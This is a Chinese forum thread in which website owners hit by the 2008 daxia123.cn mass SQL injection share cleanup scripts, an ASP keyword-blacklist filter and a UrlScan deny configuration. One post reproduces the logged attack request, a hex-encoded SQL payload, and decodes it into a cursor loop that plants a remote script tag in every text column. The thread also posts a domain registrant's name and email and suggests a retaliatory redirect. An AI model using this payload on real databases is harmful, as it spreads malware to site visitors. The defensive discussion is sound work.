瑞星卡卡安全论坛

使用这个防注水，好像暂时安全了，但是加入这个，正常的发布新闻也发布不了了

加入注入代码有东西不能提交是因为注入代码过滤了词汇，可以查看记录信息，看过滤掉了哪个词汇，比如引号什么的，比如brand或者action=select这个词会因为含and和select而被过滤掉导致不能提交，一般是在post的过滤词汇里，把这些频繁出现的词汇删除了就好了，但是如果自己可以写代码判断的话那就最好，如果有那位高人能写出来可以能发出来共享一下呗。
我也加了注入代码，有些需要提交的地方用另一个连接数据库的页面，然后把里面的某些删除了。
昨天加完今天到现在还没有出现问题。。。。继续关注。。。。。

近期大家都被daxia123.cn上的注入病毒搞的很惨，经查该域名是张国新先生注册的，查证信息如下：

域名 daxia123.cn
域名状态 clientHold
域名联系人 张新国
管理联系人电子邮件 he358@yahoo.cn
所属注册商 北京万网志成科技有限公司
域名服务器 dns27.hichina.com
域名服务器 dns28.hichina.com
注册日期 2008-04-28 20:43
过期日期 2009-04-28 20:43




请大家找到此人联系一下，可能病毒不是他搞的，但目前只要先停掉域名的解析或转向，就可以先暂停掉病毒，也给大家时间想办法修复，能看到些贴的朋友请帮忙，我已经发邮件到此域名联系人的邮箱了，但不知道会不会有回复。

已经把网站代码重写了，相信应该能搞定这些问题。。

真是不胜其烦啊，有哪位大侠出来给弄个彻底点的办法！:default3:

我也中标了..不过我用了一个比较笨的办法冶了标.没治本..先将就一下.

就是过滤了html代码.因为我的全是在网站标题,关键字,描述,也就是网站参数配置上面出现的..所以调用的时候去掉了html代码..

继续关键最终解决办法!

中标二个多星期了，恢复数据库不管用，一直瘫痪中，上面的到底哪个方法比较可行呢？

添加防注入代码到是可以防止daxia123
但是不能发布文章和上传图片了，那位大侠来解决一下呀！
加入的防注入代码为：
+++++++++++++++++++++++++++++++++++++++++++++++++++
<%dim sql_leach,sql_leach_0,Sql_DATA,SQL_Get,Sql_Post
sql_leach = "',and,exec,insert,select,delete,update,count,chr,mid,master,truncate,char,declare,0x4445434C4152452040542056415243484,4152452040542056415243484152283235352,0x4445434C415245204054205,48415228323535292C4043205641524,22832353529204445434C415245205,61626C655F437572736F7220435552534F5220464F52205345,45435420612E6E616D652C622E6E616D652046524F4D207379736F626A656, <script,92C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435,F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970,5204054205641524348415228323535292C404320564152434,VaRcHaR,sYsDaTaBaSeS,sElEcT,dEcLaRe"
'以上是除了常规防注入字符集外。又加了本木马专有的十六进制字符集。
sql_leach_0 = split(sql_leach,",")

If Request.QueryString <>"" Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(sql_leach_0)
if instr(Request.QueryString(SQL_Get),sql_leach_0(Sql_DATA))>0 Then
Response.Write "请不要提交可注入的字符串！非法字符为"&sql_leach_0(Sql_DATA)
Response.end
end if
next

Next
End If


If Request.Form <>"" Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(sql_leach_0)
if instr(Request.Form(Sql_Post),sql_leach_0(Sql_DATA))>0 Then
Response.Write "请不要提交可注入的字符串！非法字符为"&sql_leach_0(Sql_DATA)
Response.end
end if
next
next
end if%>
++++++++++++++++++++++++++++++++++++++++++
还有一个关键的只要将这段代码放入conn.asp 那么就提示
dim 名称重定义
我将变量设置的再如何复杂都无济于事
:default8:

你的帖子非常受用，但是有个问题，对ntext、text类型的不能修改，能否麻烦仁兄给补充一个，不胜感激

use 数据库名称
update 表名称 set 列名称=replace(CAST(列名称 AS varchar(8000)),'修改的字符',' ')
这是针对text,ntext类型的修改，但是我没法加入到水上飞云的代码中，只能手动找到无法用水上飞云的代码修改的列，在进行查询修改，望水上飞云结合下我这个代码集成到你的代码中去

用DW把该代码批量删除,这是非法的恶意链接.

这个不是在代码中的，是直接写入数据库的

/***********定义要去除的字符,请注意,可能不止一条,我的服务器就查到两条************/
declare @delStr nvarchar(500)
set @delStr='<script src=http://cn.daxia123.cn/cn.js></script>'
--set @delStr='<script src=http://cn.jxmmtv.com/cn.js></script>'
/****************************************/

/**********以下为操作实体************/
set nocount on

declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int
declare @sql nvarchar(500)

set @iResult=0
declare cur cursor for
select name,id from sysobjects where xtype='U'

open cur
fetch next from cur into @tableName,@tbID

while @@fetch_status=0
begin
  declare cur1 cursor for
        --xtype in (231,167,239,175,99,35) 为char,varchar,nchar,nvarchar,ntext,text类型
        select name from syscolumns where xtype in (231,167,239,175,99,35) and id=@tbID
  open cur1
  fetch next from cur1 into @columnName
  while @@fetch_status=0
  begin
      set @sql='update [' + @tableName + '] set ['+ @columnName +']= replace(convert(nvarchar(4000),['+@columnName+']),'''+@delStr+''','''') where ['+@columnName+'] like ''%'+@delStr+'%'''     
      exec sp_executesql @sql     
      set @iRow=@@rowcount
      set @iResult=@iResult+@iRow
      if @iRow>0
      begin
    print '表：'+@tableName+',列:'+@columnName+'被更新'+convert(varchar(10),@iRow)+'条记录;'
      end     
      fetch next from cur1 into @columnName


  end
  close cur1
  deallocate cur1
 
  fetch next from cur into @tableName,@tbID
end
print '数据库共有'+convert(varchar(10),@iResult)+'条记录被更新!!!'

close cur
deallocate cur
set nocount off
/*****以上为操作实体******/

这个东西是asp页面攻击，从log记录看到这个东西
QUERY_STRING:matchid=155;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F636E2E64617869613132332E636E2F636E2E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20aS%20VaRcHaR(4000));eXeC(@s);--

中间这二进制转换了就是：
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u'
AND b.xtype in (99,35,231,167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
print ('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

解决办法，在asp页面里加入防注入代码就行，
攻击者是利用软件提交url的，从http头可以看出：
ALL_HTTP:HTTP_HOST:finance.jmcatv.com.cn
HTTP_USER_AGENT:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP_COOKIE:ASPSESSIONIDSCATDTRT=BDMADAACPKFKLCNABMGEJONK
HTTP_CACHE_CONTROL:no-cache
ALL_RAW:Host: finance.jmcatv.com.cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Cookie: ASPSESSIONIDSCATDTRT=BDMADAACPKFKLCNABMGEJONK
Cache-Control: no-cache

返回警告语句没用，最好是
重定向到其它页面：如叫他下载个软件，呵呵，要大文件下载，
如警告无效后，将它列入黑名单，再访问时，就叫它下载：
If IsBlackIP(GetCIP) Then           
'//黑名单访问，送它一免费杀毒软件，以示警告！呵呵呵，毒！
  response.redirect "http://download.rising.com.cn/Middle/RavolSKY.exe"
End If

对于被黑的网站，如大量asp页面，需要进行asp安全性检测和进行批处理加入防注入的，或对所有静态动态页面进行批量清除无用代码非法代码的，可用delphi设计入简单的程序处理。如果不会，我做了个，可以留下你的email，我将程序和代码发给你。

今天下午发现的，俺现在还在加班弄这个破数据库……强烈谴责这一无聊无耻的行径！！

俺就那几个特殊页面没加过滤，他就TMD找到了，我哭了~~~~以后EXEC是肯定要过滤的！！不管了~~气愤中……:default4: :default4:

我也深受其害，好在我有自己的服务器，可以安装urlscan，设置url长度，暂时还凑效，一天来好几个攻击都被挡住了，看了一下ip地址，韩国的居多，还有美国、卡塔尔和国内等

楼上，能不能详细说一下？

楼上，能不能具体说一下urlscan怎么配置

我的 urlscan.ini设置是这样的
[options]

UseAllowVerbs=1                ; If 1, use [AllowVerbs] section, else use the
                              ; [DenyVerbs] section.

UseAllowExtensions=0          ; If 1, use [AllowExtensions] section, else use
                              ; the [DenyExtensions] section.

NormalizeUrlBeforeScan=1      ; If 1, canonicalize URL before processing.

VerifyNormalization=1          ; If 1, canonicalize URL twice and reject request
                              ; if a change occurs.

AllowHighBitCharacters=0      ; If 1, allow high bit (ie. UTF8 or MBCS)
                              ; characters in URL.

AllowDotInPath=0              ; If 1, allow dots that are not file extensions.

RemoveServerHeader=0          ; If 1, remove the 'Server' header from response.

EnableLogging=1                ; If 1, log UrlScan activity.

PerProcessLogging=0            ; If 1, the UrlScan.log filename will contain a PID
                              ; (ie. UrlScan.123.log).

AllowLateScanning=0            ; If 1, then UrlScan will load as a low priority
                              ; filter.

PerDayLogging=1                ; If 1, UrlScan will produce a new log each day with
                              ; activity in the form 'UrlScan.010101.log'.

UseFastPathReject=0            ; If 1, then UrlScan will not use the
                              ; RejectResponseUrl or allow IIS to log the request.

LogLongUrls=0                  ; If 1, then up to 128K per request can be logged.
                              ; If 0, then only 1k is allowed.

;
; If UseFastPathReject is 0, then UrlScan will send
; rejected requests to the URL specified by RejectResponseUrl.
; If not specified, '/<Rejected-by-UrlScan>' will be used.
;

RejectResponseUrl=

;
; LoggingDirectory can be used to specify the directory where the
; log file will be created.  This value should be the absolute path
; (ie. c:\some\path).  If not specified, then UrlScan will create
; the log in the same directory where the UrlScan.dll file is located.
;

LoggingDirectory=G:\WINNT\system32\inetsrv\urlscan\logs

;
; If RemoveServerHeader is 0, then AlternateServerName can be
; used to specify a replacement for IIS's built in 'Server' header
;

AlternateServerName=

[RequestLimits]

;
; The entries in this section impose limits on the length
; of allowed parts of requests reaching the server.
;
; It is possible to impose a limit on the length of the
; value of a specific request header by prepending "Max-" to the
; name of the header.  For example, the following entry would
; impose a limit of 100 bytes to the value of the
; 'Content-Type' header:
;
;  Max-Content-Type=100
;
; To list a header and not specify a maximum value, use 0
; (ie. 'Max-User-Agent=0').  Also, any headers not listed
; in this section will not be checked for length limits.
;
; There are 3 special case limits:
;
;  - MaxAllowedContentLength specifies the maximum allowed
;    numeric value of the Content-Length request header.  For
;    example, setting this to 1000 would cause any request
;    with a content length that exceeds 1000 to be rejected.
;    The default is 30000000.
;
;  - MaxUrl specifies the maximum length of the request URL,
;    not including the query string. The default is 260 (which
;    is equivalent to MAX_PATH).
;
;  - MaxQueryString specifies the maximum length of the query
;    string.  The default is 2048.
;

MaxAllowedContentLength=30000000
MaxUrl=80
MaxQueryString=75

[AllowVerbs]

;
; The verbs (aka HTTP methods) listed here are those commonly
; processed by a typical IIS server.
;
; Note that these entries are effective if "UseAllowVerbs=1"
; is set in the [Options] section above.
;

GET
HEAD
POST

[DenyVerbs]

;
; The verbs (aka HTTP methods) listed here are used for publishing
; content to an IIS server via WebDAV.
;
; Note that these entries are effective if "UseAllowVerbs=0"
; is set in the [Options] section above.
;

PROPFIND
PROPPATCH
MKCOL
DELETE
PUT
COPY
MOVE
LOCK
UNLOCK
OPTIONS
SEARCH

[DenyHeaders]

;
; The following request headers alter processing of a
; request by causing the server to process the request
; as if it were intended to be a WebDAV request, instead
; of a request to retrieve a resource.
;

Translate:
If:
Lock-Token:
Transfer-Encoding:

[AllowExtensions]

;
; Extensions listed here are commonly used on a typical IIS server.
;
; Note that these entries are effective if "UseAllowExtensions=1"
; is set in the [Options] section above.
;

.htm
.html
.txt
.jpg
.jpeg
.gif

[DenyExtensions]

;
; Extensions listed here either run code directly on the server,
; are processed as scripts, or are static files that are
; generally not intended to be served out.
;
; Note that these entries are effective if "UseAllowExtensions=0"
; is set in the [Options] section above.
;
; Also note that ASP scripts are denied with the below
; settings.  If you wish to enable ASP, remove the
; following extensions from this list:
;    .asp
;    .cer
;    .cdx
;    .asa
;

; Deny ASP requests

.cer
.cdx
.asa

; Deny executables that could run on the server
.exe
.bat
.cmd
.com

; Deny infrequently used scripts
.htw    ; Maps to webhits.dll, part of Index Server
.ida    ; Maps to idq.dll, part of Index Server
.idq    ; Maps to idq.dll, part of Index Server
.htr    ; Maps to ism.dll, a legacy administrative tool
.idc    ; Maps to httpodbc.dll, a legacy database access tool
.shtm    ; Maps to ssinc.dll, for Server Side Includes
.shtml  ; Maps to ssinc.dll, for Server Side Includes
.stm    ; Maps to ssinc.dll, for Server Side Includes
.printer ; Maps to msw3prt.dll, for Internet Printing Services

; Deny various static files
.ini    ; Configuration files
.log    ; Log files
.pol    ; Policy files
.dat    ; Configuration files

[DenyUrlSequences]
..  ; Don't allow directory traversals
./  ; Don't allow trailing dot on a directory name
\  ; Don't allow backslashes in URL
:  ; Don't allow alternate stream access
%  ; Don't allow escaping after normalization
&  ; Don't allow multiple CGI processes to run on a single request
@
declare
select

希望有帮助

你那是哪个版本的？

我也在找解决方法啊

该用户帖子内容已被屏蔽

UPDATE TABLENAME set COLNAME= REPLACE(convert(varchar(8000),COLNAME),'muma.js','')   

MS SQL的NTEXT不支持REPLACE，需转换为VARCHAR || NVARCHAR

这个代码怎么用呢，能说的详细点吧。非常感谢！